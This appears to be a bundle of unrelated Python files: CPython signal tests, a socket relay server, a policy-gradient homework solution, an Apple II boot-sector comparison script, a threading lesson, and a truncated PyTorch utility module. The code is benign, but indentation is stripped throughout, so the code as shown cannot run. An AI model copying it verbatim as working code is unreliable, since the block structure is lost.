# process. A new interpreter is spawned to avoid problems when mixing
# threads and fork(): only async-safe functions are allowed between
# fork() and exec().
assert_python_ok("-c", """if True:
import os, threading, sys, time, signal
# the default handler terminates the process
signum = signal.SIGUSR1
def kill_later():
# wait until the main thread is waiting in sigwait()
time.sleep(1)
os.kill(os.getpid(), signum)
# the signal must be blocked by all the threads
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
killer = threading.Thread(target=kill_later)
killer.start()
received = signal.sigwait([signum])
if received != signum:
print("sigwait() received %s, not %s" % (received, signum),
file=sys.stderr)
sys.exit(1)
killer.join()
# unblock the signal, which should have been cleared by sigwait()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
""")
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_arguments(self):
self.assertRaises(TypeError, signal.pthread_sigmask)
self.assertRaises(TypeError, signal.pthread_sigmask, 1)
self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3)
self.assertRaises(OSError, signal.pthread_sigmask, 1700, [])
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask(self):
code = """if 1:
import signal
import os; import threading
def handler(signum, frame):
1/0
def kill(signum):
os.kill(os.getpid(), signum)
def check_mask(mask):
for sig in mask:
assert isinstance(sig, signal.Signals), repr(sig)
def read_sigmask():
sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, [])
check_mask(sigmask)
return sigmask
signum = signal.SIGUSR1
# Install our signal handler
old_handler = signal.signal(signum, handler)
# Unblock SIGUSR1 (and copy the old mask) to test our signal handler
old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
check_mask(old_mask)
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Block and then raise SIGUSR1. The signal is blocked: the signal
# handler is not called, and the signal is now pending
mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
check_mask(mask)
kill(signum)
# Check the new mask
blocked = read_sigmask()
check_mask(blocked)
if signum not in blocked:
raise Exception("%s not in %s" % (signum, blocked))
if old_mask ^ blocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum))
# Unblock SIGUSR1
try:
# unblock the pending signal calls immediately the signal handler
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Check the new mask
unblocked = read_sigmask()
if signum in unblocked:
raise Exception("%s in %s" % (signum, unblocked))
if blocked ^ unblocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum))
if old_mask != unblocked:
raise Exception("%s != %s" % (old_mask, unblocked))
"""
assert_python_ok('-c', code)
@unittest.skipIf(sys.platform == 'freebsd6',
"issue #12392: send a signal to the main thread doesn't work "
"before the creation of the first thread on FreeBSD 6")
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill_main_thread(self):
# Test that a signal can be sent to the main thread with pthread_kill()
# before any other thread has been created (see issue #12392).
code = """if True:
import threading
import signal
import sys
def handler(signum, frame):
sys.exit(3)
signal.signal(signal.SIGUSR1, handler)
signal.pthread_kill(threading.get_ident(), signal.SIGUSR1)
sys.exit(2)
"""
with spawn_python('-c', code) as process:
stdout, stderr = process.communicate()
exitcode = process.wait()
if exitcode != 3:
raise Exception("Child error (exit code %s): %s" %
(exitcode, stdout))
def test_main():
try:
support.run_unittest(GenericTests, PosixTests, InterProcessSignalTests,
WakeupFDTests, WakeupSignalTests,
SiginterruptTest, ItimerTest, WindowsSignalTests,
PendingSignalsTests)
finally:
support.reap_children()
if __name__ == "__main__":
test_main()
|
server.py
|
import logging
import queue
import socket
import threading
import select
import config
logging.basicConfig(
format='%(asctime)s.%(msecs)03d %(levelname)s:\t%(message)s',
level=logging.INFO,
datefmt='%H:%M:%S')
class Server:
def __init__(self):
self._socket = None
self._server_running_flag = threading.Event()
self._server_thread = None
def _server_loop(self, ):
inputs = [self._socket]
outputs = []
data_buffers = {}
while self._server_running_flag.is_set():
readable, writable, exceptional = select.select(inputs, outputs, inputs)
for sock in readable:
if sock is self._socket:
client_socket, client_address = sock.accept()
# if the server socket turns up in the inputs list, it means a new socket has connected to the
# server socket.
# ssl_sock = context.wrap_socket(client_socket, server_side=True)
client_socket.setblocking(False)
inputs.append(client_socket)
data_buffers[client_socket] = queue.Queue()
logging.info(f"Connection successful from {client_address}")
else:
try:
data = sock.recv(config.PACKET_SIZE)
except ConnectionResetError as e:
data = None
if data: # if the data isn't determined to be falsey, then add to the buffer.
if sock not in outputs:
outputs.append(sock)
for out_sock in outputs: # if the socket isn't the same one that received it, put into
# all other sockets' outgoing buffers.
# if out_sock != sock:
data_buffers[out_sock].put(data)
else: # if empty, remove/disconnect client socket
exceptional.append(sock)
for sock in writable:
try:
data = data_buffers[sock].get_nowait()
except queue.Empty:
outputs.remove(sock)
else:
try:
sock.send(data)
except ConnectionResetError:
exceptional.append(sock)
for sock in exceptional: # if any errors happen with the client socket, disconnect the socket.
logging.info(f"Disconnect from {sock.getpeername()}")
inputs.remove(sock)
if sock in outputs:
outputs.remove(sock)
sock.close()
del data_buffers[sock]
self._socket.close()
self._server_running_flag.clear()
def start_server(self, ip: str, port: int) -> bool:
"""
:param ip: IP/Hostname of the server.
:param port: Port of the server.
:return: Boolean if the server has successfully started.
"""
if self._server_running_flag.is_set():
return True
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setblocking(False)
self._server_running_flag.clear()
try:
self._socket.bind((ip, int(port)))
self._socket.listen(config.MAX_JOINABLE_CLIENTS)
self._server_thread = threading.Thread(target=Server._server_loop, args=(self,), daemon=True)
self._server_running_flag.set()
self._server_thread.start()
logging.info(f"Server started from IP: {ip}, port: {port}")
except ConnectionResetError as e:
logging.error(e)
self._server_running_flag.clear()
return self._server_running_flag.is_set()
def stop_server(self):
self._server_running_flag.clear()
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
# throws error when divide by zero
np.seterr(all='raise')
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
z = (data-np.mean(data)) / (np.std(data) + 1e-8)
return z * std + mean
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
initializer = None
if activation == tf.tanh or activation == tf.sigmoid:
initializer = tf.contrib.layers.xavier_initializer()
elif activation == tf.nn.relu or activation == tf.nn.leaky_relu:
initializer = tf.initializers.he_normal()
output_placeholder = tf.layers.dense(input_placeholder, size, activation=activation, kernel_initializer=initializer)
for i in range(n_layers - 1):
output_placeholder = tf.layers.dense(output_placeholder, size, activation=activation, kernel_initializer=initializer)
output_initializer = None
if output_activation == tf.tanh or output_activation == tf.sigmoid:
output_initializer = tf.contrib.layers.xavier_initializer()
elif output_activation == tf.nn.relu or output_activation == tf.nn.leaky_relu:
output_initializer = tf.initializers.he_normal()
output_placeholder = tf.layers.dense(output_placeholder, output_size, activation=output_activation, kernel_initializer=output_initializer)
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
# testing gpu allocation
tf_config.gpu_options.allow_growth = True
# end test
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
# for debugging
import datetime
writer = tf.summary.FileWriter('./tensorboard_logs/' + str(datetime.datetime.now().strftime("%Y_%m_%d_%H_%M_%S")), self.sess.graph)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim , "policy", self.n_layers, self.size)
return sy_logits_na
else:
sy_mean = build_mlp(sy_ob_no, self.ac_dim , "policy", self.n_layers, self.size)
sy_logstd = tf.Variable(np.random.rand(self.ac_dim), trainable=True, dtype=tf.float32, name="logstd")
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
dist = tf.distributions.Categorical(logits=sy_logits_na)
sy_sampled_ac = dist.sample()
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
dist = tf.distributions.Categorical(logits=sy_logits_na)
sy_logprob_n = dist.log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
distribution = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean, scale_diag=tf.exp(sy_logstd))
sy_logprob_n = distribution.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
loss = -tf.reduce_mean(tf.multiply(self.sy_logprob_n, self.sy_adv_n))
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(dtype=tf.float32, shape=[None,], name="targetQ")
baseline_loss = tf.losses.mean_squared_error(self.sy_target_n, self.baseline_prediction)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ac = self.sess.run(self.sy_sampled_ac, feed_dict={
self.sy_ob_no : [ob]
})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
q_n = []
if self.reward_to_go:
for i in range(len(re_n)):
for j in range(len(re_n[i])):
rewardToGo = 0
for k in range(j, len(re_n[i])):
rewardToGo += (self.gamma ** (k - j)) * re_n[i][k]
q_n.append(rewardToGo)
else:
for i in range(len(re_n)):
episodeTotalReward = 0
for j in range(len(re_n[i])):
episodeTotalReward += (self.gamma ** j) * re_n[i][j]
for j in range(len(re_n[i])):
q_n.append(episodeTotalReward)
return q_n
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
b_n = self.sess.run(self.baseline_prediction, feed_dict={
self.sy_ob_no : ob_no
})
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = normalize(adv_n)
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
target_n = normalize(q_n)
self.sess.run(self.baseline_update_op, feed_dict={
self.sy_ob_no : ob_no,
self.sy_target_n : target_n
})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
self.sess.run(self.update_op, feed_dict={
self.sy_ob_no : ob_no,
self.sy_ac_na : ac_na,
self.sy_adv_n : adv_n
})
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
boot1_levenshtein.py
|
import bitstring
import datetime
import heapq
import multiprocessing
import pylev
import sqlite3
DB_PATH = '/tank/apple2/data/apple2.db'
WORKERS = 2
def main():
conn = sqlite3.connect(DB_PATH)
cursor = conn.cursor()
q = cursor.execute(
"""
select boot1_sha1, boot1.data, count(*) as c from disks
join
(select sha1, data from boot1) as boot1
on disks.boot1_sha1 = boot1.sha1 group by 1;
"""
)
hashes = []
sectors = {}
for r in q:
(hash, sector, count) = r
sectors[hash] = bitstring.BitString(bytes=sector).bin
hashes.append((count, intern(str(hash))))
hashes.sort()
num_items = len(hashes) * (len(hashes) + 1) / 2
workitems = []
for idx, data1 in enumerate(hashes):
(cnt1, hash1) = data1
for data2 in hashes[idx+1:]:
(cnt2, hash2) = data2
score = cnt1*cnt2
heapq.heappush(workitems, (-score, hash1, hash2))
num_workitems = len(workitems)
queue = multiprocessing.JoinableQueue()
results = multiprocessing.Queue()
workers = []
for _ in xrange(WORKERS):
worker = multiprocessing.Process(target=levenshtein_worker, args=(queue, results))
worker.start()
workers.append(worker)
print "Workers started"
q = cursor.execute(
"""
select source, target from boot1distances
"""
)
existing = set((intern(str(s)), intern(str(t))) for (s, t) in q)
print "Found %d existing entries" % len(existing)
items_put = 0
while True:
try:
(score, hash1, hash2) = heapq.heappop(workitems)
except IndexError:
break
if (hash1, hash2) in existing and (hash2, hash1) in existing:
continue
items_put += 1
sector1 = sectors[hash1]
sector2 = sectors[hash2]
queue.put_nowait((hash1, hash2, sector1, sector2, score))
del existing
print "%d items put" % items_put
queue.close()
start_time = datetime.datetime.now()
num_results = 0
batch = []
while True:
result = results.get()
num_results += 1
(hash1, hash2, distance, score) = result
batch.append(result)
if num_results % 100 == 0 or num_results == items_put:
# Insert results into DB
cursor.executemany(
"""INSERT OR REPLACE INTO Boot1Distances (source, target, distance) VALUES (?, ?, ?)""",
[(hash1, hash2, distance) for (hash1, hash2, distance, score) in batch]
)
# Inverse pairing
cursor.executemany(
"""INSERT OR REPLACE INTO Boot1Distances (source, target, distance) VALUES (?, ?, ?)""",
[(hash2, hash1, distance) for (hash1, hash2, distance, score) in batch]
)
conn.commit()
if num_results == items_put:
break
now = datetime.datetime.now()
eta = datetime.timedelta(
seconds=(now - start_time).total_seconds() * items_put / num_results) + start_time
print "%d/%d results = %f%% (Score: %d, ETA: %s)" % (
num_results, items_put, float(100*num_results)/items_put, score, eta)
batch = []
print "Done"
conn.close()
def levenshtein_worker(queue, results):
while True:
work = queue.get()
(hash1, hash2, sector1, sector2, score) = work
distance = pylev.levenshtein(sector1, sector2)
results.put_nowait((hash1, hash2, distance, score))
queue.task_done()
if __name__ == "__main__":
main()
|
Lesson12.py
|
# coding:utf-8
'''
date:2017-11-08
函数,模块和包,面对对象和设计模式,异常处理,正则表达式,系统脚本
'''
# import subprocess
# subprocess.check_output(r'dir')
import os
os.system(r'dir')
import time, threading
def doWork():
name = threading.currentThread().getName()
print "%s start..." % name
time.sleep(3)
print "%s stop..." % name
print time.time()
aThread = threading.Thread(target=doWork, name="aThread")
aThread.start()
bThread = threading.Thread(target=doWork, name="bThread")
bThread.start()
aThread.join()
bThread.join()
print time.time()
print '我们'
|
utility.py
|
import datetime
import math
import os
import time
from multiprocessing import Process
from multiprocessing import Queue
import imageio
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
matplotlib.use("Agg")
class timer:
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart:
self.t0 = time.time()
return diff
def hold(self):
